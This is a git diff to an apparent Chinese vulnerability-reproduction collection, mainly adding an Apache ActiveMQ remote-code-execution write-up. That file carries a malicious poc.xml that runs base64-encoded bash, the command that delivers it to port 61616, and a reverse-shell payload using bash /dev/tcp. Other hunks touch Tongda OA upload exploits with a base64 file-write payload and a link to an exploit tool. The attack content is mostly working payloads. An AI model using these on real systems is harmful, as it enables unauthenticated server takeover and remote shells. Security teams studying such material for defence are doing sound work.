diff --git a/OA产品漏洞/通达OA v11.8 api.ali.php 任意文件上传漏洞.md b/OA产品漏洞/通达OA v11.8 api.ali.php 任意文件上传漏洞.md index cfbd665..61afccf 100644 --- a/OA产品漏洞/通达OA v11.8 api.ali.php 任意文件上传漏洞.md +++ b/OA产品漏洞/通达OA v11.8 api.ali.php 任意文件上传漏洞.md @@ -2,7 +2,7 @@ ## 漏洞描述 -通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器 +通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件控制服务器 ## 漏洞影响 @@ -37,7 +37,8 @@ Content-Type: application/octet-stream 参数a base解码 ``` -ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==file_put_contents('../../fb6790f4.php',''); +ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw== +file_put_contents('../../fb6790f4.php',''); ``` ![image-20220520154357492](./images/202205201543536.png) diff --git a/OA产品漏洞/通达OA v2017 action_upload.php 任意文件上传漏洞.md b/OA产品漏洞/通达OA v2017 action_upload.php 任意文件上传漏洞.md index 7e638b8..6163520 100644 --- a/OA产品漏洞/通达OA v2017 action_upload.php 任意文件上传漏洞.md +++ b/OA产品漏洞/通达OA v2017 action_upload.php 任意文件上传漏洞.md @@ -1,3 +1,5 @@ +# 通达OA v2017 action_upload.php 任意文件上传漏洞 + ## 漏洞描述 通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞 @@ -63,4 +65,7 @@ submit 再访问上传的文件 -![img](./images/202202091053249.png) \ No newline at end of file +![img](./images/202202091053249.png) + +利用工具:https://github.com/Fu5r0dah/TongdaScan_go + diff --git a/README.md b/README.md index 24d5224..769f22e 100644 --- a/README.md +++ b/README.md @@ -466,6 +466,7 @@ * Apache ActiveMQ Console控制台默认弱口令 * Apache ActiveMQ 信息泄漏漏洞 CVE-2017-15709 * Apache ActiveMQ 反序列化漏洞 CVE-2015-5254 + * Apache ActiveMQ远程代码执行 * Apache Axis 远程代码执行漏洞 CVE-2019-0227 * Apache Cocoon XML注入 CVE-2020-11991 * Apache CouchDB epmd 远程命令执行漏洞 CVE-2022-24706 diff --git a/Web服务器漏洞/Apache ActiveMQ远程代码执行.md b/Web服务器漏洞/Apache ActiveMQ远程代码执行.md new file mode 100644 index 0000000..3d6be17 --- /dev/null +++ b/Web服务器漏洞/Apache ActiveMQ远程代码执行.md @@ -0,0 +1,113 @@ +# Apache ActiveMQ远程代码执行 + +## 漏洞描述 + +Apache ActiveMQ 是 Apache 软件基金会研发的一个开源消息中间件,为应用程序提供高效的、可扩展的、稳定的和安全的企业级消息通信。 + +当未经身份认证的攻击者访问 Apache ActiveMQ 的 61616 端口时,可通过发送恶意数据在远程服务器上执行代码,进而控制 Apache ActiveMQ 服务器。 + +更新日期:2023-10-25 + +参考链接: + +- https://activemq.apache.org/activemq-5016006-release +- https://github.com/Fw-fW-fw/activemq_Throwable + +## 漏洞影响 + +``` +Apache ActiveMQ < 5.18.3 +``` + +## 环境搭建 + +在 ActiveMQ 官方下载 5.16.6 版本安装包,链接:https://activemq.apache.org/activemq-5016006-release + +解压安装包,在目录 ./apache-activemq-5.16.6/bin/linux-x86-64 下以控制台模式启动,方便排查报错信息,注意使用 jdk 11: + +``` +./activemq console +``` + +![image-20231027181920007](images/image-20231027181920007.png) + +访问 8161 端口管理页面: + +![image-20231030090050081](images/image-20231030090050081.png) + +## 漏洞复现 + +编写 poc.xml,托管在 8080 端口。开启 http 服务: + +``` +python3 -m http.server 8080 +``` + +![image-20231027181935525](images/image-20231027181935525.png) + +执行命令: + +``` +touch /tmp/success +------- +base64编码:dG91Y2ggL3RtcC9zdWNjZXNz +``` + +poc.xml(注意缩进): + +``` + + + + + + bash + -c + {echo,dG91Y2ggL3RtcC9zdWNjZXNz}|{base64,-d}|{bash,-i} + + + + +``` + +使用 [poc](https://github.com/Fw-fW-fw/activemq_Throwable) 进行复现: + +``` +java -jar activemq_poc.jar 127.0.0.1 61616 http://127.0.0.1:8080/poc.xml +``` + +成功执行 `touch /tmp/success`: + +![image-20231027181843920](images/image-20231027181843920.png) + +反弹 shell 的 poc.xml: + +``` + + + + + + bash + -c + {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i} + + + + + +``` + +![image-20231030083005877](images/image-20231030083005877.png) + +## 修复建议 + +根据影响版本中的信息,排查并升级到安全版本,或直接访问参考链接获取官方更新指南。补丁下载链接:https://github.com/apache/activemq/tags diff --git a/Web服务器漏洞/images/image-20231027181843920.png b/Web服务器漏洞/images/image-20231027181843920.png new file mode 100644 index 0000000..5f5a899 Binary files /dev/null and b/Web服务器漏洞/images/image-20231027181843920.png differ diff --git a/Web服务器漏洞/images/image-20231027181920007.png b/Web服务器漏洞/images/image-20231027181920007.png new file mode 100644 index 0000000..8c76ac7 Binary files /dev/null and b/Web服务器漏洞/images/image-20231027181920007.png differ diff --git a/Web服务器漏洞/images/image-20231027181935525.png b/Web服务器漏洞/images/image-20231027181935525.png new file mode 100644 index 0000000..29c2da3 Binary files /dev/null and b/Web服务器漏洞/images/image-20231027181935525.png differ diff --git a/Web服务器漏洞/images/image-20231030083005877.png b/Web服务器漏洞/images/image-20231030083005877.png new file mode 100644 index 0000000..1253b6c Binary files /dev/null and b/Web服务器漏洞/images/image-20231030083005877.png differ diff --git a/Web服务器漏洞/images/image-20231030090050081.png b/Web服务器漏洞/images/image-20231030090050081.png new file mode 100644 index 0000000..1168738 Binary files /dev/null and b/Web服务器漏洞/images/image-20231030090050081.png differ diff --git a/Web服务器漏洞/images/image-20231030091008369.png b/Web服务器漏洞/images/image-20231030091008369.png new file mode 100644 index 0000000..c4c27b6 Binary files /dev/null and b/Web服务器漏洞/images/image-20231030091008369.png differ